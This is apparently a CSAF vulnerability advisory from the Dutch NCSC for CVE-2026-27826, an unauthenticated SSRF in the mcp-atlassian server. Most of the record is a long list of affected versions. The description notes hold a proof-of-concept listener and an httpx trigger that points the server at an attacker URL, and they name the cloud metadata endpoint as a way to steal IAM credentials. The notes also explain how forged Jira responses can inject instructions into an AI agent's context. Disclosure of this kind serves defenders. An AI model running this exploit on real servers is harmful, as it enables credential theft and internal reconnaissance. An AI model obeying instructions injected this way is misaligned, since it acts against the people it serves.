{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-27826", "tracking": { "current_release_date": "2026-04-01T07:33:16.735084Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-27826", "initial_release_date": "2026-03-10T19:28:34.291598Z", "revision_history": [ { "date": "2026-03-10T19:28:34.291598Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-10T19:28:37.146379Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-10T19:39:19.872094Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1).| Unknown change." }, { "date": "2026-03-10T19:39:22.407461Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-10T19:58:23.563866Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-10T19:58:28.248416Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-11T00:39:30.269393Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (72).| Product Identifiers created (71).| References created (2).| CWES updated (1)." }, { "date": "2026-03-11T14:58:16.048340Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-19T15:29:49.785438Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-20T09:39:40.615143Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-04-01T07:33:11.298367Z", "number": "11", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)." }, { "date": "2026-04-01T07:33:15.102872Z", "number": "12", "summary": "NCSC Score updated." } ], "status": "interim", "version": "12" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/0.1.1", "product": { "name": "vers:unknown/0.1.1", "product_id": "CSAFPID-5780881", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.10", "product": { "name": "vers:unknown/0.1.10", "product_id": "CSAFPID-5780882", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.10" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.11", "product": { "name": "vers:unknown/0.1.11", "product_id": "CSAFPID-5780883", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.11" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.12", "product": { "name": "vers:unknown/0.1.12", "product_id": "CSAFPID-5780884", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.12" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.13", "product": { "name": "vers:unknown/0.1.13", "product_id": "CSAFPID-5780885", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.13" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.14", "product": { "name": "vers:unknown/0.1.14", "product_id": "CSAFPID-5780886", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.14" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.15", "product": { "name": "vers:unknown/0.1.15", "product_id": "CSAFPID-5780887", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.15" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.16", "product": { "name": "vers:unknown/0.1.16", "product_id": "CSAFPID-5780888", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.16" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.2", "product": { "name": "vers:unknown/0.1.2", "product_id": "CSAFPID-5780889", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.3", "product": { "name": "vers:unknown/0.1.3", "product_id": "CSAFPID-5780890", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.4", "product": { "name": "vers:unknown/0.1.4", "product_id": "CSAFPID-5780891", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.6", "product": { "name": "vers:unknown/0.1.6", "product_id": "CSAFPID-5780892", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.7", "product": { "name": "vers:unknown/0.1.7", "product_id": "CSAFPID-5780893", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.7" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.8", "product": { "name": "vers:unknown/0.1.8", "product_id": "CSAFPID-5780894", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.1.9", "product": { "name": "vers:unknown/0.1.9", "product_id": "CSAFPID-5780895", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.1.9" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.0", "product": { "name": "vers:unknown/0.10.0", "product_id": "CSAFPID-5780896", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.1", "product": { "name": "vers:unknown/0.10.1", "product_id": "CSAFPID-5780897", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.2", "product": { "name": "vers:unknown/0.10.2", "product_id": "CSAFPID-5780898", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.3", "product": { "name": "vers:unknown/0.10.3", "product_id": "CSAFPID-5780899", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.4", "product": { "name": "vers:unknown/0.10.4", "product_id": "CSAFPID-5780900", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.5", "product": { "name": "vers:unknown/0.10.5", "product_id": "CSAFPID-5780901", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.10.6", "product": { "name": "vers:unknown/0.10.6", "product_id": "CSAFPID-5780902", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.10.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.0", "product": { "name": "vers:unknown/0.11.0", "product_id": "CSAFPID-5780903", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.1", "product": { "name": "vers:unknown/0.11.1", "product_id": "CSAFPID-5780904", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.10", "product": { "name": "vers:unknown/0.11.10", "product_id": "CSAFPID-5780905", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.10" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.11", "product": { "name": "vers:unknown/0.11.11", "product_id": "CSAFPID-5780906", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.11" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.12", "product": { "name": "vers:unknown/0.11.12", "product_id": "CSAFPID-5780907", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.12" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.2", "product": { "name": "vers:unknown/0.11.2", "product_id": "CSAFPID-5780908", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.2a2", "product": { "name": "vers:unknown/0.11.2a2", "product_id": "CSAFPID-5780909", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.2a2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.3", "product": { "name": "vers:unknown/0.11.3", "product_id": "CSAFPID-5780910", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.4", "product": { "name": "vers:unknown/0.11.4", "product_id": "CSAFPID-5780911", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.5", "product": { "name": "vers:unknown/0.11.5", "product_id": "CSAFPID-5780912", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.6", "product": { "name": "vers:unknown/0.11.6", "product_id": "CSAFPID-5780913", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.7", "product": { "name": "vers:unknown/0.11.7", "product_id": "CSAFPID-5780914", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.7" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.8", "product": { "name": "vers:unknown/0.11.8", "product_id": "CSAFPID-5780915", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.8" } } }, { "category": "product_version_range", "name": "vers:unknown/0.11.9", "product": { "name": "vers:unknown/0.11.9", "product_id": "CSAFPID-5780916", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.11.9" } } }, { "category": "product_version_range", "name": "vers:unknown/0.12.0", "product": { "name": "vers:unknown/0.12.0", "product_id": "CSAFPID-5780917", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.12.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.13.0", "product": { "name": "vers:unknown/0.13.0", "product_id": "CSAFPID-5780918", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.13.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.13.1", "product": { "name": "vers:unknown/0.13.1", "product_id": "CSAFPID-5780919", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.13.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.14.0", "product": { "name": "vers:unknown/0.14.0", "product_id": "CSAFPID-5780920", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.14.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.14.1", "product": { "name": "vers:unknown/0.14.1", "product_id": "CSAFPID-5780921", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.14.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.14.2", "product": { "name": "vers:unknown/0.14.2", "product_id": "CSAFPID-5780922", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.14.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.14.3", "product": { "name": "vers:unknown/0.14.3", "product_id": "CSAFPID-5780923", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.15.0", "product": { "name": "vers:unknown/0.15.0", "product_id": "CSAFPID-5780924", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.15.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.16.0", "product": { "name": "vers:unknown/0.16.0", "product_id": "CSAFPID-5780925", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.16.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.16.1", "product": { "name": "vers:unknown/0.16.1", "product_id": "CSAFPID-5780926", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.16.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.0", "product": { "name": "vers:unknown/0.2.0", "product_id": "CSAFPID-5780927", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.1", "product": { "name": "vers:unknown/0.2.1", "product_id": "CSAFPID-5780928", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.2", "product": { "name": "vers:unknown/0.2.2", "product_id": "CSAFPID-5780929", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.3", "product": { "name": "vers:unknown/0.2.3", "product_id": "CSAFPID-5780930", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.4", "product": { "name": "vers:unknown/0.2.4", "product_id": "CSAFPID-5780931", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.5", "product": { "name": "vers:unknown/0.2.5", "product_id": "CSAFPID-5780932", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.2.6", "product": { "name": "vers:unknown/0.2.6", "product_id": "CSAFPID-5780933", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.2.6" } } }, { "category": "product_version_range", "name": "vers:unknown/0.3.0", "product": { "name": "vers:unknown/0.3.0", "product_id": "CSAFPID-5780934", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.3.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.3.1", "product": { "name": "vers:unknown/0.3.1", "product_id": "CSAFPID-5780935", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.4.0", "product": { "name": "vers:unknown/0.4.0", "product_id": "CSAFPID-5780936", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.4.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.5.0", "product": { "name": "vers:unknown/0.5.0", "product_id": "CSAFPID-5780937", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.5.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.6.0", "product": { "name": "vers:unknown/0.6.0", "product_id": "CSAFPID-5780938", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.6.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.6.1", "product": { "name": "vers:unknown/0.6.1", "product_id": "CSAFPID-5780939", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.6.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.6.2", "product": { "name": "vers:unknown/0.6.2", "product_id": "CSAFPID-5780940", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.6.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.6.3", "product": { "name": "vers:unknown/0.6.3", "product_id": "CSAFPID-5780941", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.6.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.6.4", "product": { "name": "vers:unknown/0.6.4", "product_id": "CSAFPID-5780942", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.6.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.6.5", "product": { "name": "vers:unknown/0.6.5", "product_id": "CSAFPID-5780943", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.6.5" } } }, { "category": "product_version_range", "name": "vers:unknown/0.7.0", "product": { "name": "vers:unknown/0.7.0", "product_id": "CSAFPID-5780944", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.7.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.7.1", "product": { "name": "vers:unknown/0.7.1", "product_id": "CSAFPID-5780945", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.7.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.8.0", "product": { "name": "vers:unknown/0.8.0", "product_id": "CSAFPID-5780946", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.8.0" } } }, { "category": "product_version_range", "name": "vers:unknown/0.8.1", "product": { "name": "vers:unknown/0.8.1", "product_id": "CSAFPID-5780947", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.8.1" } } }, { "category": "product_version_range", "name": "vers:unknown/0.8.2", "product": { "name": "vers:unknown/0.8.2", "product_id": "CSAFPID-5780948", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.8.2" } } }, { "category": "product_version_range", "name": "vers:unknown/0.8.3", "product": { "name": "vers:unknown/0.8.3", "product_id": "CSAFPID-5780949", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.8.3" } } }, { "category": "product_version_range", "name": "vers:unknown/0.8.4", "product": { "name": "vers:unknown/0.8.4", "product_id": "CSAFPID-5780950", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.8.4" } } }, { "category": "product_version_range", "name": "vers:unknown/0.9.0", "product": { "name": "vers:unknown/0.9.0", "product_id": "CSAFPID-5780951", "product_identification_helper": { "purl": "pkg:pypi/mcp-atlassian@0.9.0" } } }, { "category": "product_version_range", "name": "vers:unknown/<0.17.0", "product": { "name": "vers:unknown/<0.17.0", "product_id": "CSAFPID-5777014" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<0.17.0", "product": { "name": "vers:unknown/>=0|<0.17.0", "product_id": "CSAFPID-5780952" } } ], "category": "product_name", "name": "mcp-atlassian" } ], "category": "vendor", "name": "sooperset" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.17.0", "product": { "name": "vers:unknown/<0.17.0", "product_id": "CSAFPID-5970924" } } ], "category": "product_name", "name": "mcp-atlassian" } ], "category": "vendor", "name": "unknown" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-27826", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "notes": [ { "category": "description", "text": "### Summary\nAn unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169.254.169.254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results.\n\n### Details\nThe server supports a multi-tenant HTTP authentication mode where clients supply per-request Jira/Confluence URLs via custom headers. The middleware (`src/mcp_atlassian/servers/main.py:436–448`) extracts `X-Atlassian-Jira-Url` from the request and stores it in request state with no validation. The dependency provider (`src/mcp_atlassian/servers/dependencies.py:189–217`) then uses this value directly as the `url=` parameter when constructing a `JiraConfig` and `JiraFetcher`. The first method call on the fetcher (`get_current_user_account_id()`) immediately issues a `GET` request to `{header_url}/rest/api/2/myself` — an outbound SSRF call to the attacker-controlled URL.\n\nNo comparison is made against the server-configured `JIRA_URL` environment variable. No private IP range blocklist is applied. No URL scheme allowlist is enforced.\n\n **Trigger conditions — all four must hold:**\n 1. Server running with `--transport streamable-http` or `--transport sse`\n 2. Request contains `X-Atlassian-Jira-Url` header (any non-empty value)\n 3. Request contains `X-Atlassian-Jira-Personal-Token` header (any non-empty value)\n 4. Request has **no** `Authorization` header\n\n An identical vulnerability exists for Confluence at `dependencies.py:341–393` via `X-Atlassian-Confluence-Url` +\n `X-Atlassian-Confluence-Personal-Token`.\n\n **Root cause - middleware** (`src/mcp_atlassian/servers/main.py:436–448`):\n ```python\n # When service headers are present and no Authorization header is provided,\n # auth type is set to \"pat\" but user_atlassian_token is NOT set.\n # This is what routes execution to the vulnerable path below.\n if service_headers and (jira_token_str and jira_url_str):\n scope[\"state\"][\"user_atlassian_auth_type\"] = \"pat\"\n\n Root cause - dependency provider (src/mcp_atlassian/servers/dependencies.py:189–217):\n if (\n user_auth_type == \"pat\"\n and jira_url_header # attacker-controlled, no validation\n and jira_token_header\n and not hasattr(request.state, \"user_atlassian_token\")\n ):\n header_config = JiraConfig(\n url=jira_url_header, # used directly, no allowlist check\n personal_token=jira_token_header,\n ...\n )\n header_jira_fetcher = JiraFetcher(config=header_config)\n header_jira_fetcher.get_current_user_account_id()\n # ^ GET {jira_url_header}/rest/api/2/myself — outbound SSRF call\n request.state.jira_fetcher = header_jira_fetcher # cached for all tool calls this request\n\n\n### PoC\nStep 1 - Start a listener to capture the inbound SSRF request:\n\n # listener.py\n from http.server import HTTPServer, BaseHTTPRequestHandler\n import json, sys\n\n class Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n print(f\"[SSRF RECEIVED] Path: {self.path}\", file=sys.stderr)\n print(f\"[SSRF RECEIVED] Headers: {dict(self.headers)}\", file=sys.stderr)\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n if \"myself\" in self.path:\n self.wfile.write(json.dumps({\n \"accountId\": \"ssrf-confirmed\",\n \"displayName\": \"SSRF PoC\"\n }).encode())\n else:\n self.wfile.write(b\"{}\")\n def log_message(self, *args): pass\n\n HTTPServer((\"0.0.0.0\", 8888), Handler).serve_forever()\n\nStep 2 - Start mcp-atlassian in HTTP transport mode (placeholder credentials are sufficient — the vulnerable path is reached before any real Atlassian instance is contacted):\n\n JIRA_URL=https://placeholder.atlassian.net \\\n JIRA_API_TOKEN=placeholder \\\n mcp-atlassian --transport streamable-http --port 8000\n\n Step 3 — Trigger the SSRF:\n\n import httpx, json\n\n MCP = \"http://localhost:8000/mcp\"\n ATTACK = \"http://:8888\"\n\n # Initialize MCP session\n r = httpx.post(MCP, json={\n \"jsonrpc\": \"2.0\", \"method\": \"initialize\",\n \"params\": {\"protocolVersion\": \"2024-11-05\", \"capabilities\": {},\n \"clientInfo\": {\"name\": \"poc\", \"version\": \"1.0\"}},\n \"id\": 1\n }, headers={\n \"X-Atlassian-Jira-Url\": ATTACK,\n \"X-Atlassian-Jira-Personal-Token\": \"any-value\",\n # No Authorization header — this is the key condition\n })\n sid = r.headers.get(\"mcp-session-id\")\n\n # Call any Jira tool — this triggers get_jira_fetcher() and the outbound SSRF call\n httpx.post(MCP, json={\n \"jsonrpc\": \"2.0\", \"method\": \"tools/call\",\n \"params\": {\"name\": \"jira_get_issue\", \"arguments\": {\"issue_key\": \"PROJ-1\"}},\n \"id\": 2\n }, headers={\n \"X-Atlassian-Jira-Url\": ATTACK,\n \"X-Atlassian-Jira-Personal-Token\": \"any-value\",\n \"Mcp-Session-Id\": sid,\n })\n\n The listener will receive GET /rest/api/2/myself originating from the MCP server process, confirming the SSRF.\n\n\n### Impact\nThis vulnerability affects any deployment using `--transport streamable-http` or `--transport sse`. The default HOST=0.0.0.0 binding exposes the HTTP endpoint to any host on the same network without any configuration change, and to the internet when deployed on a cloud instance.\n\n - Any HTTP deployment: The server acts as an SSRF proxy, enabling reconnaissance of internal services (databases, internal APIs, microservices)\n not directly reachable from outside the network.\n - AI agent sessions: Once the attacker-controlled fetcher is cached in request.state, all Jira tool responses for that session originate from the attacker's server. The attacker can return crafted API responses containing LLM instructions, injecting those instructions into the AI agent's context as if they were legitimate Jira data - a prompt injection channel at the data layer requiring no tool parameter manipulation.\n - Cloud deployments: Any network-reachable attacker can potentially steal the server's IAM role credentials via the instance metadata service, gaining full access to all cloud resources that role permits.", "title": "github - https://api.github.com/advisories/GHSA-7r34-79r5-rcc9" }, { "category": "description", "text": "MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to version 0.17.0, an unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169[.]254[.]169[.]254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results. Version 0.17.0 fixes the issue.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27826" }, { "category": "description", "text": "MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to version 0.17.0, an unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169[.]254[.]169[.]254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results. Version 0.17.0 fixes the issue.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27826" }, { "category": "description", "text": "### Summary\nAn unauthenticated attacker who can reach the mcp-atlassian HTTP endpoint can force the server process to make outbound HTTP requests to an arbitrary attacker-controlled URL by supplying two custom HTTP headers without an `Authorization` header. No authentication is required. The vulnerability exists in the HTTP middleware and dependency injection layer — not in any MCP tool handler - making it invisible to tool-level code analysis. In cloud deployments, this could enable theft of IAM role credentials via the instance metadata endpoint (`169.254.169.254`). In any HTTP deployment it enables internal network reconnaissance and injection of attacker-controlled content into LLM tool results.\n\n### Details\nThe server supports a multi-tenant HTTP authentication mode where clients supply per-request Jira/Confluence URLs via custom headers. The middleware (`src/mcp_atlassian/servers/main.py:436–448`) extracts `X-Atlassian-Jira-Url` from the request and stores it in request state with no validation. The dependency provider (`src/mcp_atlassian/servers/dependencies.py:189–217`) then uses this value directly as the `url=` parameter when constructing a `JiraConfig` and `JiraFetcher`. The first method call on the fetcher (`get_current_user_account_id()`) immediately issues a `GET` request to `{header_url}/rest/api/2/myself` — an outbound SSRF call to the attacker-controlled URL.\n\nNo comparison is made against the server-configured `JIRA_URL` environment variable. No private IP range blocklist is applied. No URL scheme allowlist is enforced.\n\n **Trigger conditions — all four must hold:**\n 1. Server running with `--transport streamable-http` or `--transport sse`\n 2. Request contains `X-Atlassian-Jira-Url` header (any non-empty value)\n 3. Request contains `X-Atlassian-Jira-Personal-Token` header (any non-empty value)\n 4. Request has **no** `Authorization` header\n\n An identical vulnerability exists for Confluence at `dependencies.py:341–393` via `X-Atlassian-Confluence-Url` +\n `X-Atlassian-Confluence-Personal-Token`.\n\n **Root cause - middleware** (`src/mcp_atlassian/servers/main.py:436–448`):\n ```python\n # When service headers are present and no Authorization header is provided,\n # auth type is set to \"pat\" but user_atlassian_token is NOT set.\n # This is what routes execution to the vulnerable path below.\n if service_headers and (jira_token_str and jira_url_str):\n scope[\"state\"][\"user_atlassian_auth_type\"] = \"pat\"\n\n Root cause - dependency provider (src/mcp_atlassian/servers/dependencies.py:189–217):\n if (\n user_auth_type == \"pat\"\n and jira_url_header # attacker-controlled, no validation\n and jira_token_header\n and not hasattr(request.state, \"user_atlassian_token\")\n ):\n header_config = JiraConfig(\n url=jira_url_header, # used directly, no allowlist check\n personal_token=jira_token_header,\n ...\n )\n header_jira_fetcher = JiraFetcher(config=header_config)\n header_jira_fetcher.get_current_user_account_id()\n # ^ GET {jira_url_header}/rest/api/2/myself — outbound SSRF call\n request.state.jira_fetcher = header_jira_fetcher # cached for all tool calls this request\n\n\n### PoC\nStep 1 - Start a listener to capture the inbound SSRF request:\n\n # listener.py\n from http.server import HTTPServer, BaseHTTPRequestHandler\n import json, sys\n\n class Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n print(f\"[SSRF RECEIVED] Path: {self.path}\", file=sys.stderr)\n print(f\"[SSRF RECEIVED] Headers: {dict(self.headers)}\", file=sys.stderr)\n self.send_response(200)\n self.send_header(\"Content-Type\", \"application/json\")\n self.end_headers()\n if \"myself\" in self.path:\n self.wfile.write(json.dumps({\n \"accountId\": \"ssrf-confirmed\",\n \"displayName\": \"SSRF PoC\"\n }).encode())\n else:\n self.wfile.write(b\"{}\")\n def log_message(self, *args): pass\n\n HTTPServer((\"0.0.0.0\", 8888), Handler).serve_forever()\n\nStep 2 - Start mcp-atlassian in HTTP transport mode (placeholder credentials are sufficient — the vulnerable path is reached before any real Atlassian instance is contacted):\n\n JIRA_URL=https://placeholder.atlassian.net \\\n 